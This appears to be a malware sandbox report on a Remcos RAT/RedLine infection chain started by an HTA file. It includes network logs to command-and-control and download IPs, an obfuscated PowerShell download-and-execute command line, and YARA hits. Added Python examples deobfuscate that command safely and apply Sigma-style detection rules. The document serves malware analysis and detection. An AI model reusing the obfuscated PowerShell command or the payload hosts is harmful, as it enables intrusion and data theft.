                                                                              Dec 16, 2024 17:33:54.653616905 CET500722560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:54.774112940 CET256050072107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:56.377437115 CET256050072107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:56.377518892 CET500722560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:56.377589941 CET500722560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:56.497422934 CET256050072107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:56.831453085 CET500732560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:56.951386929 CET256050073107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:56.951482058 CET500732560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:56.955085993 CET500732560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:57.074976921 CET256050073107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:58.890146971 CET256050073107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:58.890768051 CET500732560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:58.890930891 CET500732560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:59.011030912 CET256050073107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:59.286679029 CET500742560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:59.407502890 CET256050074107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:59.407596111 CET500742560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:59.656265020 CET500742560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:59.776042938 CET256050074107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:01.357773066 CET256050074107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:01.357873917 CET500742560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:01.357991934 CET500742560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:01.478388071 CET256050074107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:01.753741026 CET500752560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:01.873661995 CET256050075107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:01.876163960 CET500752560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:02.174818039 CET500752560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:02.294918060 CET256050075107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:03.826939106 CET256050075107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:03.826994896 CET500752560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:03.827130079 CET500752560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:03.946825981 CET256050075107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:04.272372007 CET500762560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:04.393215895 CET256050076107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:04.393337011 CET500762560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:04.647898912 CET500762560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:04.768028021 CET256050076107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:06.331016064 CET256050076107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:06.331130981 CET500762560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:06.331218004 CET500762560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:06.451241970 CET256050076107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:06.689722061 CET500772560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:06.809696913 CET256050077107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:06.809905052 CET500772560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:07.040433884 CET500772560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:07.161191940 CET256050077107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:08.752547026 CET256050077107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:08.752657890 CET500772560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:08.752767086 CET500772560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:08.872594118 CET256050077107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:09.102160931 CET500782560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:09.224962950 CET256050078107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:09.225107908 CET500782560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:09.476947069 CET500782560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:09.599654913 CET256050078107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:11.163357973 CET256050078107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:11.163417101 CET500782560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:11.163609028 CET500782560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:11.284086943 CET256050078107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:11.552261114 CET500792560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:11.676034927 CET256050079107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:11.679994106 CET500792560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:11.919214010 CET500792560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:12.038929939 CET256050079107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:13.639971018 CET256050079107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:13.640104055 CET500792560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:13.640158892 CET500792560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:13.760119915 CET256050079107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:14.011995077 CET500802560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:14.132386923 CET256050080107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:14.132508039 CET500802560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:14.380361080 CET500802560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:14.500334024 CET256050080107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:16.081033945 CET256050080107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:16.084199905 CET500802560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:16.084290028 CET500802560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:16.204358101 CET256050080107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:16.447716951 CET500812560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:16.567845106 CET256050081107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:16.568259954 CET500812560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:16.776143074 CET500812560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:16.895984888 CET256050081107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:18.650593996 CET256050081107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:18.650733948 CET500812560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:18.651007891 CET500812560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:18.772953033 CET256050081107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:19.003511906 CET500822560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:19.123366117 CET256050082107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:19.123466015 CET500822560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:19.355465889 CET500822560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:19.475987911 CET256050082107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:21.062587976 CET256050082107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:21.062808990 CET500822560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:21.062865973 CET500822560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:21.183044910 CET256050082107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:21.417874098 CET500832560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:21.537672997 CET256050083107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:21.537842035 CET500832560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:21.752460957 CET500832560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:21.945466042 CET256050083107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:23.576494932 CET256050083107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:23.576702118 CET500832560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:23.576756954 CET500832560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:23.696654081 CET256050083107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:23.939965963 CET500842560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:24.059772015 CET256050084107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:24.060147047 CET500842560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:24.063752890 CET500842560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:24.185342073 CET256050084107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:26.009071112 CET256050084107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:26.009268999 CET500842560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:26.009269953 CET500842560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:26.129467964 CET256050084107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:26.421283007 CET500852560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:26.541238070 CET256050085107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:26.541500092 CET500852560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:26.755002975 CET500852560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:26.877984047 CET256050085107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:28.541759968 CET256050085107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:28.541836977 CET500852560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:28.696043968 CET500852560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:28.816206932 CET256050085107.173.4.16192.168.2.4
• 192.3.179.166
Session ID: 0 | Source IP: 192.168.2.4 | Source Port: 49730 | Destination IP: 192.3.179.166 | Destination Port: 80 | PID: 2568 | Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 17:30:27.786887884 CET | 285 | OUT | GET /75/ecome.exe HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                              Host: 192.3.179.166
                                                                              Connection: Keep-Alive
Dec 16, 2024 17:30:28.926110029 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                              Date: Mon, 16 Dec 2024 16:30:28 GMT
                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                              Last-Modified: Mon, 16 Dec 2024 12:01:19 GMT
                                                                              ETag: "84000-62961f03fa810"
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 540672
                                                                              Keep-Alive: timeout=5, max=100
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-msdownload
                                                                              Dec 16, 2024 17:30:29.046210051 CET1236INData Raw: 00 bc f2 47 00 08 3b 40 00 00 00 00 00 00 00 00 00 03 00 00 00 18 3b 40 00 28 3b 40 00 44 3c 40 00 fc 3f 40 00 00 00 00 00 bc f2 47 00 02 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 08 3b 40 00 00 00 00 00 00 00 00 00 00 00 00 00 10
                                                                              Data Ascii: G;@;@(;@D<@?@G@;@GX;@h;@x;@;@;@G@X;@;@;@;@,G@;@LG;@;@;


                                                                              Target ID:0
                                                                              Start time:11:30:23
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:mshta.exe "C:\Users\user\Desktop\newthingswithgreatupdateiongivenbestthingswithme.hta"
                                                                              Imagebase:0x2a0000
                                                                              File size:13'312 bytes
                                                                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:1
                                                                              Start time:11:30:23
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'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'+[cHAR]0x22+'))')))"
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:11:30:23
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:3
                                                                              Start time:11:30:23
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'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'+[cHAR]0x22+'))')))"
                                                                              Imagebase:0x90000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true
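
The PowerShell command line above randomizes the casing of every keyword and assembles its Invoke-Expression argument from 'literal'+[char]N pieces, so that neither the :: operator nor the closing double quotes appear verbatim in the command line. The following Python is an added example and not part of the Joe Sandbox report or of the sample: it folds the concatenation chain back into one literal, recovers and decodes the FromBase64String argument, and lists keyword occurrences whose casing matches none of the forms a human or a script generator writes, which is the basis of a case-anomaly check. The base64 blob, which the report elides, is replaced by a constructed stand-in that decodes to a harmless string, and the keyword table is a minimal set chosen for the example.

```python
import base64
import re

# Constructed input: the PowerShell command line from the process list above,
# with the base64 argument (elided in the report) replaced by a constructed
# stand-in that decodes to a harmless string, so the example runs offline.
STAGE2_B64 = base64.b64encode(b"Write-Host 'constructed stage-2 stand-in'").decode()
SAMPLE_CMDLINE = (
    "PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; "
    "INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58"
    "+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('"
    "+[cHAr]0X22+'" + STAGE2_B64 + "'+[cHAR]0x22+'))')))"
)

# One term of a PowerShell string concatenation: a single-quoted literal or
# [char]N with N decimal or 0x hex; type names and hex digits are case-insensitive.
_TERM = r"(?:'[^']*'|\[char\]\s*(?:0x[0-9a-f]+|\d+))"
_CHAIN = re.compile(rf"{_TERM}(?:\s*\+\s*{_TERM})+", re.IGNORECASE)
_TOKEN = re.compile(r"'([^']*)'|\[char\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)
_B64_CALL = re.compile(r"FromBase64String\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)", re.IGNORECASE)


def _char_code(text):
    return int(text, 16) if text.lower().startswith("0x") else int(text)


def _fold_chain(match):
    parts = []
    for t in _TOKEN.finditer(match.group(0)):
        parts.append(t.group(1) if t.group(2) is None else chr(_char_code(t.group(2))))
    # A single quote inside a PowerShell single-quoted literal is written as ''.
    return "'" + "".join(parts).replace("'", "''") + "'"


def fold_concatenations(cmdline):
    """Collapse every 'a'+[char]58+'b' chain into the single literal 'a:b'."""
    return _CHAIN.sub(_fold_chain, cmdline)


# Casings a human or a script generator writes; any other casing of these
# keywords is deliberate randomization. Minimal table chosen for the example.
KEYWORD_CASINGS = {
    "powershell": {"powershell", "PowerShell", "POWERSHELL"},
    "invoke-expression": {"invoke-expression", "Invoke-Expression", "INVOKE-EXPRESSION"},
    "bypass": {"bypass", "Bypass", "BYPASS"},
    "frombase64string": {"frombase64string", "FromBase64String", "FROMBASE64STRING"},
    "getstring": {"getstring", "GetString", "GETSTRING"},
}


def case_anomalies(text):
    """Return keyword occurrences whose casing matches none of the usual forms."""
    odd = []
    for keyword, accepted in KEYWORD_CASINGS.items():
        for m in re.finditer(re.escape(keyword), text, re.IGNORECASE):
            if m.group(0) not in accepted:
                odd.append(m.group(0))
    return odd


def analyze(cmdline):
    """Fold the concatenations, decode the base64 stage, and score the casing."""
    folded = fold_concatenations(cmdline)
    m = _B64_CALL.search(folded)
    payload = base64.b64decode(m.group(1)) if m else None
    # Blank the base64 argument before scoring so the blob's own mixed case
    # cannot produce accidental keyword hits.
    scored = _B64_CALL.sub(lambda mm: mm.group(0).replace(mm.group(1), ""), folded)
    return {"folded": folded, "payload": payload, "anomalies": case_anomalies(scored)}


if __name__ == "__main__":
    result = analyze(SAMPLE_CMDLINE)
    print("folded   :", result["folded"])
    print("payload  :", result["payload"])
    print("anomalies:", result["anomalies"])
```

Folding is done on the text alone, without evaluating anything, so it is safe to run on a hostile command line; the decoded payload is returned as bytes and is never executed. On the sample this yields six keyword occurrences with randomized casing, which is why a single signature of this kind fires even though every individual token is a legitimate PowerShell name.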

                                                                              Target ID:4
                                                                              Start time:11:30:26
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline"
                                                                              Imagebase:0xad0000
                                                                              File size:2'141'552 bytes
                                                                              MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:11:30:26
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC255.tmp" "c:\Users\user\AppData\Local\Temp\jxpeahvf\CSC89F653F7BE434269AEE32879D026A860.TMP"
                                                                              Imagebase:0x810000
                                                                              File size:46'832 bytes
                                                                              MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true
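
The process list above is the kind of process-creation telemetry (image, parent image, command line) that the Sigma rules named in this report are evaluated against. The following Python is an added example and not the report's or the Sigma project's code: it encodes the processes of Target IDs 0 to 6 as constructed events, reconstructs the parent links as an assumption (the report lists Target IDs, not parent PIDs; cmd.exe carries the PowerShell command line, PowerShell invokes csc.exe, csc.exe invokes cvtres.exe, and PowerShell runs the dropped executable), and evaluates simplified Sigma-style selections written for this example against them. The base64 payload is abbreviated to "(...)" in the constructed command lines, and the rule bodies are approximations of the published rules, not copies of them.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class ProcEvent:
    target_id: int
    image: str
    cmdline: str
    parent_id: Optional[int]  # Target ID of the parent; None for the root


# Constructed process-creation events mirroring the process list above. The
# parent links are an assumption reconstructed from the command lines; the
# base64 payload of the PowerShell command is abbreviated to "(...)".
EVENTS = [
    ProcEvent(0, r"C:\Windows\SysWOW64\mshta.exe",
              r'mshta.exe "C:\Users\user\Desktop\newthingswithgreatupdateiongivenbestthingswithme.hta"', None),
    ProcEvent(1, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon(...)"', 0),
    ProcEvent(2, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", 1),
    ProcEvent(3, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r"PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon(...)", 1),
    ProcEvent(4, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline"', 3),
    ProcEvent(5, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
              r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC255.tmp" "c:\Users\user\AppData\Local\Temp\jxpeahvf\CSC89F653F7BE434269AEE32879D026A860.TMP"', 4),
    ProcEvent(6, r"C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe",
              r'"C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe"', 3),
]

# Simplified Sigma-style selections written for this example (not the
# published rules the report names). A key is Field|modifier[|all]; a list
# of patterns is any-of unless |all is present; all conditions of a
# selection must hold; matching is case-insensitive, as in Sigma.
RULES = [
    {"title": "Suspicious MSHTA Child Process",
     "selection": {"ParentImage|endswith": "\\mshta.exe",
                   "Image|endswith": ["\\cmd.exe", "\\powershell.exe", "\\wscript.exe",
                                      "\\cscript.exe", "\\rundll32.exe", "\\regsvr32.exe"]}},
    {"title": "Dot net compiler compiles file from suspicious location",
     "selection": {"Image|endswith": ["\\csc.exe", "\\vbc.exe"],
                   "CommandLine|contains": ["\\AppData\\Local\\Temp\\", "\\Windows\\Temp\\"]}},
    {"title": "PowerShell with execution-policy bypass, no profile and hidden window",
     "selection": {"Image|endswith": "\\powershell.exe",
                   "CommandLine|contains|all": ["-ex bypass", "-nop", "-w 1"]}},
    {"title": "Executable started from a user AppData Roaming path",
     "selection": {"Image|contains": "\\AppData\\Roaming\\"}},
]


def to_sigma_fields(ev: ProcEvent, by_id: Dict[int, ProcEvent]) -> Dict[str, str]:
    """Flatten one event plus its parent into the field names Sigma rules use."""
    parent = by_id.get(ev.parent_id) if ev.parent_id is not None else None
    return {"Image": ev.image, "CommandLine": ev.cmdline,
            "ParentImage": parent.image if parent else ""}


def _match_one(value: str, modifier: str, pattern: str) -> bool:
    v, p = value.lower(), pattern.lower()
    if modifier == "endswith":
        return v.endswith(p)
    if modifier == "startswith":
        return v.startswith(p)
    if modifier == "contains":
        return p in v
    return v == p


def selection_matches(selection: dict, fields: Dict[str, str]) -> bool:
    for key, patterns in selection.items():
        name, *mods = key.split("|")
        modifier = next((m for m in mods if m != "all"), "equals")
        if not isinstance(patterns, list):
            patterns = [patterns]
        hits = [_match_one(fields.get(name, ""), modifier, p) for p in patterns]
        if not (all(hits) if "all" in mods else any(hits)):
            return False
    return True


def run_rules(events: List[ProcEvent], rules: list) -> List[Tuple[str, int]]:
    """Return (rule title, Target ID) for every event that satisfies a rule."""
    by_id = {e.target_id: e for e in events}
    alerts = []
    for ev in events:
        fields = to_sigma_fields(ev, by_id)
        for rule in rules:
            if selection_matches(rule["selection"], fields):
                alerts.append((rule["title"], ev.target_id))
    return alerts


if __name__ == "__main__":
    for title, target_id in run_rules(EVENTS, RULES):
        print(f"Target ID {target_id}: {title}")
```

Each stage of the chain trips a different rule (the cmd.exe child of mshta.exe, the PowerShell flags, csc.exe reading its input from the user's Temp folder, and the final executable running from AppData\Roaming), so even a sensor that misses the PowerShell command line still has three independent detection points. Parent image is the decisive field for the first rule; telemetry that records only the process image and command line cannot express it.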

                                                                              Target ID:6
                                                                              Start time:11:30:33
                                                                              Start date:16/12/2024
                                                                              Path:C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe"
                                                                              Imagebase:0x400000
                                                                              File size:540'672 bytes
                                                                              MD5 hash:A2D03C5333BFECCA62720CD6EE3A4DC4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.4146258809.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Author: unknown
                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Author: unknown
                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Author: ditekSHen
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4146373644.000000000068E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
